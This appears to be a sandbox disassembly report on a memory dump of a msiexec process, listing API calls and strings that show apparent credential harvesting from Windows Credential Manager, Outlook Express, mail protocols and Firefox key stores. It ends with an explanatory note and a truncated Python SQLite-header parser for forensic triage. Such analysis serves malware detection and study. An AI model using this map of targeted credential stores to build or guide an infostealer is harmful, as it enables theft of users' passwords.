                                                                    • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                      • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                      • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                      • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                      • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                      • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                      • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                      • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                    • CloseHandle.KERNEL32(?), ref: 00444206
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: File$??2@??3@$ByteCharCloseHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                    • String ID: ACD
                                                                    • API String ID: 82305771-620537770
                                                                    • Opcode ID: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                    • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                    • Opcode Fuzzy Hash: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                    • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004091EC
                                                                    • sprintf.MSVCRT ref: 00409201
                                                                      • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                      • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                      • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                    • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                    • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                    • String ID: caption$dialog_%d
                                                                    • API String ID: 2923679083-4161923789
                                                                    • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                    • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                    • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                    • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                    APIs
                                                                    • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                    Strings
                                                                    • unknown error, xrefs: 004277B2
                                                                    • no such savepoint: %s, xrefs: 00426A02
                                                                    • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                    • abort due to ROLLBACK, xrefs: 00428781
                                                                    • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                    • API String ID: 3510742995-3035234601
                                                                    • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                    • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                                    • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                    • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                    • API String ID: 2221118986-3608744896
                                                                    • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                    • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                    • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                    • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                    APIs
                                                                    • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                      • Part of subcall function 0044257F: memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcmpmemcpy
                                                                    • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                    • API String ID: 1784268899-4153596280
                                                                    APIs
                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                    • memset.MSVCRT ref: 00410246
                                                                    • memset.MSVCRT ref: 00410258
                                                                      • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                    • memset.MSVCRT ref: 0041033F
                                                                    • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                    • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                    • String ID:
                                                                    • API String ID: 3974772901-0
                                                                    APIs
                                                                    • wcslen.MSVCRT ref: 0044406C
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                    • strlen.MSVCRT ref: 004440D1
                                                                      • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                      • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                    • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                    • String ID:
                                                                    • API String ID: 577244452-0
                                                                    APIs
                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                    • _strcmpi.MSVCRT ref: 00404518
                                                                    • _strcmpi.MSVCRT ref: 00404536
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _strcmpi$memcpystrlen
                                                                    • String ID: imap$pop3$smtp
                                                                    • API String ID: 2025310588-821077329
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040C02D
                                                                      • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                      • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                      • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                      • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                      • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                      • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                      • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                      • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                      • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                    • API String ID: 2726666094-3614832568
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00403A88
                                                                    • memset.MSVCRT ref: 00403AA1
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                    • strlen.MSVCRT ref: 00403AE9
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                    • String ID:
                                                                    • API String ID: 1786725549-0
                                                                    APIs
                                                                    • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                      • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                      • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                      • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                    • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                    • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                    • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcmp$memcpy
                                                                    • String ID: global-salt$password-check
                                                                    • API String ID: 231171946-3927197501
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0
                                                                    APIs
                                                                    • GetClientRect.USER32(?,?), ref: 004016A3
                                                                    • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                    • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                    • BeginPaint.USER32(?,?), ref: 004016D7
                                                                    • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                    • EndPaint.USER32(?,?), ref: 004016F3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                    • String ID:
                                                                    • API String ID: 19018683-0
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040644F
                                                                    • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                    • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                      • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                      • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                    • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                    • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                    • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                    • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                      • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memset
                                                                    • String ID:
                                                                    • API String ID: 438689982-0
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0044495F
                                                                    • memset.MSVCRT ref: 00444978
                                                                    • memset.MSVCRT ref: 0044498C
                                                                      • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                    • strlen.MSVCRT ref: 004449A8
                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                    • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                      • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                    • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemset$strlen
                                                                    • String ID:
                                                                    • API String ID: 2142929671-0
                                                                    APIs
                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                    • strlen.MSVCRT ref: 0040F7BE
                                                                    • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                    • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                    • String ID: Passport.Net\*
                                                                    • API String ID: 2329438634-3671122194
                                                                    • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                    • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                    • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                    • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                    APIs
                                                                      • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                    • memset.MSVCRT ref: 0040330B
                                                                    • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                    • strchr.MSVCRT ref: 0040335A
                                                                      • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                    • strlen.MSVCRT ref: 0040339C
                                                                      • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                    • String ID: Personalities
                                                                    • API String ID: 2103853322-4287407858
                                                                    • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                    • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                    • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                    • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                    APIs
                                                                    Strings
                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                    • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                    • API String ID: 3510742995-272990098
                                                                    • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                    • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                                                    • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                    • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: H
                                                                    • API String ID: 2221118986-2852464175
                                                                    • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                    • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                    • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                    • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                    • API String ID: 3510742995-3170954634
                                                                    • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                    • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                    • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                    • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                    APIs
                                                                      • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                                    • memcmp.MSVCRT(?,?,00000004,00000000,?,?,0041DE5E,?,?,?,?,00436073), ref: 0041DBAE
                                                                    • memcmp.MSVCRT(?,SQLite format 3,00000010,00000000,?,?,0041DE5E,?,?,?), ref: 0041DBDB
                                                                    • memcmp.MSVCRT(?,@ ,00000003,?,?,?,00000000,?,?,0041DE5E,?,?,?), ref: 0041DC47
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcmp$memcpy
                                                                    • String ID: @ $SQLite format 3
                                                                    • API String ID: 231171946-3708268960
                                                                    • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                    • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                                                    • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                    • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
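The three memcmp calls in the record above are the header checks of an embedded SQLite library: the 16-byte compare against "SQLite format 3" is the file magic at offset 0, and the 3-byte compare against "@  " (0x40 0x20 0x20) is the payload-fraction triple at offsets 21..23 that sqlite's lockBtree() requires to be 64/32/32 before it will open a file (the operand of the 4-byte compare at 0041DBAE is not shown in the report, so it is not modelled here). The code below is an added example written for this page, not code from the report, from Joe Sandbox or from the sample; it applies the same two checks plus the page-size rule from the SQLite file format, and carves database headers out of an arbitrary blob, which is the usual way to pull browser stores out of a process or memory dump during triage. All sample headers are constructed inline.

```python
import struct

SQLITE_MAGIC = b"SQLite format 3\x00"   # 16 bytes at offset 0
PAYLOAD_FRACTIONS = b"\x40\x20\x20"       # offsets 21..23: max/min embedded, leaf payload fraction


def parse_sqlite_header(data: bytes) -> dict:
    """Validate a 100-byte SQLite 3 file header the way the embedded library does
    (magic, payload fractions, page size, read version) and return its fields."""
    if len(data) < 100:
        raise ValueError("need at least 100 bytes of header")
    if data[:16] != SQLITE_MAGIC:
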